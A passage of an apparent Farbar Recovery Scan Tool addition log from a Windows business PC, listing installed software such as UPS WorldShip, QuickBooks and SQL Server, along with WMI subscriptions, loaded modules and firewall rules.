Cyberduck (HKLM-x32\...\{a04d0673-44e7-45ff-a80e-cbb93328ddb4}) (Version: 6.0.4.24953 - iterate GmbH)
FormsComponent (HKLM-x32\...\{91032FF2-836F-4CCA-A1A3-55B966E82907}) (Version: 22.00.0000 - UPS) Hidden
FOSS (HKLM-x32\...\{267FC070-5271-4768-B33A-33E4EA0E3A74}) (Version: 22.00.0000 - UPS) Hidden
GlanceGuest version 3.8.10.56 (HKLM-x32\...\{F5AC5408-CC29-47C0-AD53-1BBBF268B364}_is1) (Version: 3.8.10.56 - Glance Networks, Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 77.0.3865.90 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.301 - Google LLC) Hidden
GoTo Opener (HKLM-x32\...\{8B2D47CC-1558-4939-B27F-41E30530072A}) (Version: 1.0.467 - LogMeIn, Inc.)
GoToAssist Corporate (HKLM-x32\...\GoToAssist) (Version: 11.3.0.1121 - Citrix Online, a division of Citrix Systems, Inc.)
ICam (HKLM-x32\...\{4E917089-4AE9-447F-A45D-6999CB726CAD}) (Version: 2.09.08.0391 - Biesse) Hidden
ICam (HKLM-x32\...\InstallShield_{4E917089-4AE9-447F-A45D-6999CB726CAD}) (Version: 2.09.08.0391 - Biesse)
ICCHelp (HKLM-x32\...\{A5763105-D1D5-4862-A3FE-EC058F9AA73E}) (Version: 22.00.0000 - UPS)
Intel® Chipset Device Software (HKLM-x32\...\{60c073df-e736-4210-9c3a-5fc2b651cef3}) (Version: 10.1.1.7 - Intel® Corporation) Hidden
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.0.1204 - Intel Corporation)
Intel® Network Connections 19.1.51.0 (HKLM\...\PROSetDX) (Version: 19.1.51.0 - Intel)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.14.4206 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 13.1.0.1058 - Intel Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 3.0.1.41 - Intel Corporation)
INTERMAC StoneCam 3.1 (HKLM-x32\...\{86316CFE-7207-4258-920B-642D350F93CA}) (Version: - )
Magic ISO Maker v5.5 (build 0281) (HKLM-x32\...\Magic ISO Maker v5.5 (build 0281)) (Version: - )
Malwarebytes version 3.8.3.2965 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.8.3.2965 - Malwarebytes)
Microsoft .NET Framework 4.7.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.7.03062 - Microsoft Corporation)
Microsoft Command Line Utilities 11 for SQL Server (HKLM-x32\...\{92216AED-67BB-4832-8A7B-BBE8FDE7C3B0}) (Version: 11.0.2270.0 - Microsoft Corporation)
Microsoft ODBC Driver 11 for SQL Server (HKLM\...\{50D6B005-B0D6-425F-953B-01331E2C7FCB}) (Version: 12.3.6024.0 - Microsoft Corporation)
Microsoft Office 365 Business - en-us (HKLM\...\O365BusinessRetail - en-us) (Version: 16.0.12026.20264 - Microsoft Corporation)
Microsoft OneDrive (HKU\.DEFAULT\...\OneDriveSetup.exe) (Version: 17.3.6743.1212 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3260922531-1593714806-1494094557-1000\...\OneDriveSetup.exe) (Version: 17.3.6281.1202 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3260922531-1593714806-1494094557-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-10082019191323926\...\OneDriveSetup.exe) (Version: 17.3.6281.1202 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 (HKLM-x32\...\Microsoft SQL Server 2008 R2) (Version: - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Native Client (HKLM\...\{79A2C6E8-C727-4D12-B4B3-19790C181DEA}) (Version: 10.52.4000.0 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Setup (English) (HKLM-x32\...\{7419AE1A-D1A5-4B24-BD78-C7ABCC26016F}) (Version: 10.52.4000.0 - Microsoft Corporation)
Microsoft SQL Server 2008 Setup Support Files (HKLM-x32\...\{8F72E2D4-1E48-4534-8DB8-1E8E012899C6}) (Version: 10.3.5500.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Management Objects (HKLM-x32\...\{9D662DE9-690E-4748-8EE5-02DD6758221E}) (Version: 11.2.5058.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Native Client (HKLM\...\{9D93D367-A2CC-4378-BD63-79EF3FE76C78}) (Version: 11.4.7462.6 - Microsoft Corporation)
Microsoft SQL Server 2014 (HKLM-x32\...\Microsoft SQL Server SQLServer2014) (Version: - Microsoft Corporation)
Microsoft SQL Server 2014 Management Objects (HKLM-x32\...\{6BF822C2-C1A4-4E45-8277-9E9F86618452}) (Version: 12.2.5000.0 - Microsoft Corporation)
Microsoft SQL Server 2014 Setup (English) (HKLM-x32\...\{D183B98A-9688-4FC1-9793-E17E42C8BAB1}) (Version: 12.3.6024.0 - Microsoft Corporation)
Microsoft SQL Server 2014 Transact-SQL ScriptDom (HKLM\...\{6CC673B9-F743-47AD-8962-C00CA5300016}) (Version: 12.3.6024.0 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2012 (HKLM-x32\...\{06E783ED-91B4-4BB3-9913-8D608E7B0702}) (Version: 11.2.5058.0 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM-x32\...\{3C379B27-9C16-489C-9296-EE1B425142DD}) (Version: 12.2.5000.0 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft VSS Writer for SQL Server 2014 (HKLM\...\{366CD715-2FF4-40B4-A8B4-A05E5D21A945}) (Version: 12.3.6024.0 - Microsoft Corporation)
MigrationUtility (HKLM-x32\...\{74582387-FCF2-4954-A23E-676FA113CE23}) (Version: 19.00.0000 - UPS)
Mozilla Firefox 69.0.1 (x64 en-US) (HKLM\...\Mozilla Firefox 69.0.1 (x64 en-US)) (Version: 69.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 69.0.1.7199 - Mozilla)
Mozilla Thunderbird 60.9.0 (x86 en-US) (HKLM-x32\...\Mozilla Thunderbird 60.9.0 (x86 en-US)) (Version: 60.9.0 - Mozilla)
MSIChecker (HKLM-x32\...\{C9D43B38-34AD-4EC2-B696-46F42D49D174}) (Version: 22.00.0000 - UPS) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
NA1Messenger (HKLM-x32\...\{D44E7219-947E-4F1B-830E-66EF11ACC543}) (Version: 22.00.0000 - Your Company Name) Hidden
NRF (HKLM-x32\...\{99A0F94F-9F09-4F09-B8D9-E8F1BBBEF212}) (Version: 22.00.0000 - UPS) Hidden
Office 16 Click-to-Run Extensibility Component (HKLM\...\{90160000-008C-0000-1000-0000000FF1CE}) (Version: 16.0.12026.20264 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-007E-0000-1000-0000000FF1CE}) (Version: 16.0.12026.20264 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM\...\{90160000-008C-0409-1000-0000000FF1CE}) (Version: 16.0.12026.20264 - Microsoft Corporation) Hidden
Oracle VM VirtualBox 5.0.20 (HKLM\...\{8209969B-9A31-4021-B0D8-E6F719F7F995}) (Version: 5.0.20 - Oracle Corporation)
PeaZip 6.1.1 (HKLM-x32\...\{5A2BC38A-406C-4A5B-BF45-6991F9A05325}_is1) (Version: 6.1.1 - Giorgio Tani)
PolicyManager (HKLM-x32\...\{2329553C-D499-4476-A20F-9C7E82ED122B}) (Version: 22.00.0000 - UPS) Hidden
QCAD/PMC 3.15.2.5 (HKLM-x32\...\QCAD/PMC) (Version: 3.15.2.5 - RibbonSoft GmbH)
QuickBooks (HKLM-x32\...\{4120AF20-BA58-49D1-8CFA-11F166E73945}) (Version: 29.0.4009.2901 - Intuit Inc.) Hidden
QuickBooks (HKLM-x32\...\{48011BF6-E0BC-4B49-9DCA-C7144EF0C01E}) (Version: 28.0.4007.2806 - Intuit Inc.) Hidden
QuickBooks (HKLM-x32\...\{604FB1E3-84F2-45E2-AD26-49422B021393}) (Version: 25.0.4017.2506 - Intuit Inc.) Hidden
QuickBooks Desktop File Doctor (HKLM-x32\...\{5B0D9337-D8AF-46E0-83A8-576DB471E0E8}) (Version: 4.5.0.0 - Intuit Inc.)
QuickBooks Pro 2015 (HKLM-x32\...\{8F02EFA1-8F5E-4E47-A6B5-D99E4FE90271}) (Version: 25.0.4001.2506 - Intuit Inc.)
QuickBooks Pro 2018 (HKLM-x32\...\{92254DF4-E735-4B1F-9E61-D1EE5FAAC03D}) (Version: 28.0.4006.2806 - Intuit Inc.)
QuickBooks Pro 2019 (HKLM-x32\...\{FD44271B-DAFF-4C50-8E9B-998AA008606A}) (Version: 29.0.4006.2901 - Intuit Inc.)
QuickBooks Runtime Redistributable (HKLM\...\{F2A4F809-2DE6-4D27-888B-4D2BB8DAF20E}) (Version: 1.00.0000 - Intuit Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7525 - Realtek Semiconductor Corp.)
Reconciler (HKLM-x32\...\{98C4DE92-27C8-482C-8431-514828756E80}) (Version: 22.00.0000 - UPS) Hidden
ReportServer (HKLM-x32\...\{C81D8576-F1B1-4E3A-9DC3-DF1B664962F0}) (Version: 22.00.0000 - Your Company Name) Hidden
RingCentral Meetings (HKU\S-1-5-21-3260922531-1593714806-1494094557-1000\...\RingCentralMeetings) (Version: 5.1 - Zoom Video Communications, Inc. and RingCentral Inc.)
RingCentral Meetings (HKU\S-1-5-21-3260922531-1593714806-1494094557-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-10082019191323926\...\RingCentralMeetings) (Version: 5.1 - Zoom Video Communications, Inc. and RingCentral Inc.)
Sentinel Protection Installer 7.6.1 (HKLM-x32\...\{7B1AA2AB-ACD2-45C7-B1B1-364BEA40615F}) (Version: 7.6.1 - SafeNet, Inc.)
Service Pack 2 for SQL Server 2008 R2 (KB2630458) (HKLM-x32\...\KB2630458) (Version: 10.52.4000.0 - Microsoft Corporation)
Service Pack 3 for SQL Server 2014 (KB4022619) (HKLM-x32\...\KB4022619) (Version: 12.3.6024.0 - Microsoft Corporation)
Skype version 8.52 (HKLM-x32\...\Skype_is1) (Version: 8.52 - Skype Technologies S.A.)
SQL Server 2008 R2 SP2 Common Files (HKLM-x32\...\{CACEA8C8-3D38-4F51-953D-1E6FC3346FEF}) (Version: 10.52.4000.0 - Microsoft Corporation) Hidden
SQL Server 2008 R2 SP2 Common Files (HKLM-x32\...\{FC835376-FF3B-4CAA-83E0-2148B3FB7C98}) (Version: 10.52.4000.0 - Microsoft Corporation) Hidden
SQL Server 2008 R2 SP2 Database Engine Services (HKLM-x32\...\{58721EC3-8D4E-4B79-BC51-1054E2DDCD10}) (Version: 10.52.4000.0 - Microsoft Corporation) Hidden
SQL Server 2008 R2 SP2 Database Engine Services (HKLM-x32\...\{B5153233-9AEE-4CD4-9D2C-4FAAC870DBE2}) (Version: 10.52.4000.0 - Microsoft Corporation) Hidden
SQL Server 2008 R2 SP2 Database Engine Shared (HKLM-x32\...\{4C9D82EB-9001-4E59-8F64-0BEEE5F4A30A}) (Version: 10.52.4000.0 - Microsoft Corporation) Hidden
SQL Server 2008 R2 SP2 Database Engine Shared (HKLM-x32\...\{F021CC0C-21C3-4038-AA4A-6E3CBC669CE8}) (Version: 10.52.4000.0 - Microsoft Corporation) Hidden
SQL Server 2014 Common Files (HKLM-x32\...\{BFB3B874-8033-4F5E-BE47-0AED2541E57C}) (Version: 12.3.6024.0 - Microsoft Corporation) Hidden
SQL Server 2014 Common Files (HKLM-x32\...\{F78A23CD-E9A0-46E3-88E2-CF2CC93AE7BA}) (Version: 12.3.6024.0 - Microsoft Corporation) Hidden
SQL Server 2014 Database Engine Services (HKLM-x32\...\{1068F65B-DD86-42B9-8F67-1D1619EE5414}) (Version: 12.3.6024.0 - Microsoft Corporation) Hidden
SQL Server 2014 Database Engine Services (HKLM-x32\...\{EDF76513-DA0A-4BE8-B499-FB61A11860D5}) (Version: 12.3.6024.0 - Microsoft Corporation) Hidden
SQL Server 2014 Database Engine Shared (HKLM-x32\...\{1D1E4532-6A52-471B-B006-EA04A2BBFCE9}) (Version: 12.3.6024.0 - Microsoft Corporation) Hidden
SQL Server 2014 Database Engine Shared (HKLM-x32\...\{AA2D8197-6678-4242-9222-3A03993E89B3}) (Version: 12.3.6024.0 - Microsoft Corporation) Hidden
SQL Server Browser for SQL Server 2014 (HKLM-x32\...\{3204DE95-97D2-4261-A286-98A262E171D4}) (Version: 12.3.6024.0 - Microsoft Corporation)
Sql Server Customer Experience Improvement Program (HKLM-x32\...\{894F30EB-3F0A-422F-9225-EB00DC9414EA}) (Version: 12.3.6024.0 - Microsoft Corporation) Hidden
Sql Server Customer Experience Improvement Program (HKLM-x32\...\{93998800-1608-403F-9A51-420A77D23C25}) (Version: 10.50.1600.1 - Microsoft Corporation) Hidden
SupportUtility (HKLM-x32\...\{31AF8802-BF43-4C43-984B-EC597CF51505}) (Version: 22.00.0000 - UPS) Hidden
System (HKLM-x32\...\{DB2C58E0-6284-4B48-97F2-22A980B6360B}) (Version: 22.00.0000 - UPS) Hidden
TeamViewer 13 (HKLM-x32\...\TeamViewer) (Version: 13.0.6447 - TeamViewer)
UnifiedPrinting (HKLM-x32\...\{CF2962CB-E3E7-4AA5-B6CE-EE59A600ECBE}) (Version: 22.00.0000 - UPS) Hidden
Unify Enterprise (HKLM-x32\...\{2EAE48CE-DD4C-440A-8673-52536395CAEB}_is1) (Version: 5.9 - Webgility, Inc)
Unify Merge Module (HKLM-x32\...\{63EDF951-961A-48E2-B30D-C14516B8A74D}) (Version: 1.0 - Webgility)
UPS WorldShip (HKLM-x32\...\UPS WorldShip) (Version: 22.0 - UPS)
UPSDB (HKLM-x32\...\{837896B9-CACA-44EF-B2F8-F6DB3D743595}) (Version: 22.00.0000 - UPS) Hidden
UPSICC (HKLM-x32\...\{390160B4-D276-4A04-8002-8D3101A0D367}) (Version: 22.00.0000 - UPS) Hidden
UPSlinkHTTP (HKLM-x32\...\{E358CC1E-4953-4E27-ADEB-8B27D8BBC20E}) (Version: 22.00.0000 - UPS) Hidden
UPSVC2013MM (HKLM-x32\...\{D99432A9-099D-4DF0-B3BA-41562C3F8B4C}) (Version: 19.00.0000 - Your Company Name) Hidden
VC12X64Redist (HKLM\...\{B573CC21-AE24-4BC5-9B0B-15CF29A3F982}) (Version: 1.00.0000 - Intuit Inc.)
VC12X86Redist (HKLM-x32\...\{EA9886ED-21F8-4867-A049-CE6817291EE6}) (Version: 1.00.0000 - Intuit Inc.)
VNC Enterprise Edition E4.6.3 (HKLM\...\RealVNC_is1) (Version: E4.6.3 - RealVNC Ltd)
VNC Mirror Driver 1.8.0 (HKLM\...\VNCMirror_is1) (Version: 1.8.0 - RealVNC Ltd.)
VNC Printer Driver 1.7.0 (HKLM\...\VNCPrinter_is1) (Version: 1.7.0 - RealVNC Ltd.)
WorldShip (HKLM-x32\...\{05221EA8-BC66-483B-8036-5CAF7B813C10}) (Version: 22.00.0000 - UPS) Hidden
WSShared (HKLM-x32\...\{4D8761F6-BB0D-48B9-81F3-58EC0CDA2090}) (Version: 22.00.0000 - UPS) Hidden
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-3260922531-1593714806-1494094557-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-10082019191323926_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation - pGFX -> Intel Corporation)
CustomCLSID: HKU\S-1-5-21-3260922531-1593714806-1494094557-1000_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation - pGFX -> Intel Corporation)
ContextMenuHandlers1: [MagicISO] -> {DB85C504-C730-49DD-BEC1-7B39C6103B7A} => C:\Program Files (x86)\MagicISO\misosh64.dll [2008-05-22] (MagicISO, Inc.) [File not signed]
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-06-26] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers4: [MagicISO] -> {DB85C504-C730-49DD-BEC1-7B39C6103B7A} => C:\Program Files (x86)\MagicISO\misosh64.dll [2008-05-22] (MagicISO, Inc.) [File not signed]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\Windows\system32\igfxDTCM.dll [2015-05-06] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [MagicISO] -> {DB85C504-C730-49DD-BEC1-7B39C6103B7A} => C:\Program Files (x86)\MagicISO\misosh64.dll [2008-05-22] (MagicISO, Inc.) [File not signed]
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-06-26] (Malwarebytes Corporation -> Malwarebytes)
==================== Shortcuts & WMI ========================
(The entries could be listed to be restored or removed.)
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
ShortcutWithArgument: C:\Users\pmcstone\Desktop\PMC Stone _ Intermac Machine Services.._.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe (Google LLC) -> --profile-directory=Default --app-id=kbmheeecikjikcklhannabjimcjedjdp
ShortcutWithArgument: C:\Users\pmcstone\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\PMC Stone _ Intermac Machine Services.._.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe (Google LLC) -> --profile-directory=Default --app-id=kbmheeecikjikcklhannabjimcjedjdp
==================== Loaded Modules (Whitelisted) ==============
2018-07-13 10:04 - 2019-09-12 23:26 - 001901568 _____ () [File not signed] C:\Program Files (x86)\Microsoft\Skype for Desktop\ffmpeg.dll
2018-07-13 10:04 - 2019-09-12 23:26 - 000115712 _____ () [File not signed] C:\Program Files (x86)\Microsoft\Skype for Desktop\libegl.dll
2018-07-13 10:04 - 2019-09-12 23:26 - 004636672 _____ () [File not signed] C:\Program Files (x86)\Microsoft\Skype for Desktop\libglesv2.dll
2016-05-28 17:27 - 2011-08-18 14:23 - 000030720 _____ () [File not signed] C:\Windows\System32\VNCpm.dll
2016-05-27 21:14 - 2007-10-03 10:19 - 000187392 _____ (Canon Inc.) [File not signed] C:\Windows\System32\CNCF2Lf.DLL
2016-05-27 21:14 - 2007-10-29 05:00 - 000269824 _____ (CANON INC.) [File not signed] C:\Windows\System32\CNMLM98.DLL
2017-03-03 15:32 - 2012-07-31 04:18 - 000359936 _____ (CANON INC.) [File not signed] C:\Windows\System32\CNMN6PPM.DLL
2016-05-27 21:14 - 2007-10-29 05:00 - 000027648 _____ (CANON INC.) [File not signed] C:\Windows\system32\spool\PRTPROCS\x64\CNMPD98.DLL
2014-05-28 10:10 - 2014-05-28 10:10 - 000526336 _____ (Intel Corporation) [File not signed] C:\Program Files\Intel\Intel® Rapid Storage Technology\ISDI2.dll
2014-05-28 10:10 - 2014-05-28 10:10 - 000296960 _____ (Intel Corporation) [File not signed] C:\Program Files\Intel\Intel® Rapid Storage Technology\PsiData.dll
2016-06-06 14:19 - 2008-05-22 23:25 - 000043520 _____ (MagicISO, Inc.) [File not signed] C:\Program Files (x86)\MagicISO\misosh64.dll
2006-01-18 16:06 - 2006-01-18 16:06 - 001017856 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Intuit\QuickBooks 2015\dbghelp.dll
2017-11-14 14:48 - 2017-11-14 14:48 - 001017856 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Intuit\QuickBooks 2019\dbghelp.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
==================== Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
==================== Hosts content: ===============================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-13 21:34 - 2009-06-10 16:00 - 000000824 _____ C:\Windows\system32\drivers\etc\hosts
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Intel\iCLS Client\;C:\Program Files\Intel\iCLS Client\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\Program Files\Intel\Intel® Management Engine Components\DAL;C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL;C:\Program Files\Intel\Intel® Management Engine Components\IPT;C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT;c:\Program Files (x86)\Microsoft SQL Server\100\Tools\Binn\;c:\Program Files (x86)\Microsoft SQL Server\100\DTS\Binn\;C:\Program Files (x86)\Microsoft SQL Server\Client SDK\ODBC\110\Tools\Binn\;C:\Program Files (x86)\Common Files\Intuit\QBPOSSDKRuntime;C:\Program Files (x86)\Microsoft SQL Server\120\Tools\Binn\;C:\Program Files (x86)\Microsoft SQL Server\120\DTS\Binn\
HKU\S-1-5-21-3260922531-1593714806-1494094557-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\pmcstone\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
HKU\S-1-5-21-3260922531-1593714806-1494094557-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-10082019191323926\Control Panel\Desktop\\Wallpaper -> C:\Users\pmcstone\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
If an entry is included in the fixlist, it will be removed.
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{1D6BB2A0-218B-4697-996B-758CAC679487}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{07621356-73D9-41FA-BD9C-1E39B023AD15}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{07BAD841-433C-466C-81CE-BC686F9034C6}] => (Allow) LPort=1434
FirewallRules: [{5DE6963F-ECB1-4A0C-BD47-F4A4C26AF5CC}] => (Allow) LPort=56725
FirewallRules: [{A29E4F00-5CE5-4059-A1E7-59712E467B72}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{38E70310-A820-44E7-BF0E-16358545C53C}] => (Allow) LPort=49611
FirewallRules: [{F293D6B0-580E-4855-A4F7-C379905A326D}] => (Allow) C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{55840614-4B06-4466-801B-EEE0828845C6}] => (Allow) C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{210ACFCD-AC8B-4291-8417-0531B64E209A}] => (Allow) LPort=8086
FirewallRules: [{FF44F486-B74B-4681-9911-ECC0BCBB6E4E}] => (Allow) LPort=8087
FirewallRules: [{ECEDACB4-8B21-42C8-9662-ABEC4C75534C}] => (Allow) C:\Program Files\RealVNC\VNC4\winvnc4.exe (RealVNC Ltd -> RealVNC Ltd)
FirewallRules: [{9CD1FDC6-628C-4460-B654-14726AFE39D1}] => (Allow) C:\Program Files\RealVNC\VNC4\winvnc4.exe (RealVNC Ltd -> RealVNC Ltd)
FirewallRules: [{C3559CA8-6A66-40AF-8B3D-0AF73B8929AB}] => (Allow) C:\Users\pmcstone\AppData\Roaming\RingCentralMeetings\bin\RingCentralMeetings.exe (RingCentral, Inc. -> Zoom Video Communications, Inc. and RingCentral Inc.)
FirewallRules: [{5FCF7F6C-4276-4140-B560-BFB922443BBF}] => (Allow) C:\Users\pmcstone\AppData\Roaming\RingCentralMeetings\bin\airhost.exe (RingCentral, Inc. -> Zoom Video Communications, Inc. and RingCentral Inc.)
FirewallRules: [{42DBDCE9-CE41-4C5F-8B5E-AE09131013A0}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{6A656E81-8553-475B-97BF-86CD9F6F75A5}] => (Allow) C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Protection Server\WinNT\spnsrvnt.exe (SafeNet, Inc. -> SafeNet, Inc)
FirewallRules: [{E138F4C9-376E-4F92-9798-6A7CB0F3D099}] => (Allow) C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Protection Server\WinNT\spnsrvnt.exe (SafeNet, Inc. -> SafeNet, Inc)
FirewallRules: [{6C9FB0B3-5E0C-4B75-89DA-154E62C5C7BB}] => (Allow) C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Keys Server\sntlkeyssrvr.exe (SafeNet, Inc. -> SafeNet, Inc.)
FirewallRules: [{AE40FA14-6167-47B0-8557-91539BEAA974}] => (Allow) C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Keys Server\sntlkeyssrvr.exe (SafeNet, Inc. -> SafeNet, Inc.)
FirewallRules: [{1ECF3F5D-101A-4F5A-AA9B-59E28480437F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{8088FDD4-3B31-49C1-A10C-6BEFD8B4A20A}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
